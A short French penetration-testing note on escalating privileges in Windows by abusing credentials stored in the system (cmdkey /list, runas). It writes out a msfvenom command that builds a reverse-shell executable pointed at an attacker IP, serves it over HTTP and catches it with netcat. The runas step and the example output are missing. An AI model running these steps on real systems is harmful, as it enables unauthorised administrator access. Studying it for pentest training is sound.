🔑Stored Credentials
Microsoft Windows offre une large gamme d'autorisations et de privilèges précis pour contrôler l'accès aux composants Windows, notamment les services, les fichiers et les entrées de registre. L'exploitation des informations d' identification stockées est une technique pour augmenter les privilèges.
Exploitation
Si un attaquant identifie une entrée d'informations d'identification stockée pour un compte administrateur, il peut opter pour une élévation de privilèges en exécutant un fichier malveillant à l'aide de l'utilitaire runas.
Pour énumérer une liste de tous les noms d'utilisateur et informations d'identification stockés, tapez :
>cmdkey /list
Imaginons qu'on trouve ceci:
Créer un exécutable malveillant:
$ msfvenom –p windows/shell_reverse_tcp lhost= <attacker IP> lport= <port d'écoute> –f exe > shel.exe
Puis le mettre dans un serveur http:
$ python –m SimpleHTTPServer 80
Démarrez un netcat dans un nouveau terminal et transférez le shell.exe et exécutez-le à l'aide de la commande suivante.
Si tout se passe bien, nous devrions avoir reçu la session de l'administrateur sur le netcat précédemment lancé.
Dernière mise à jour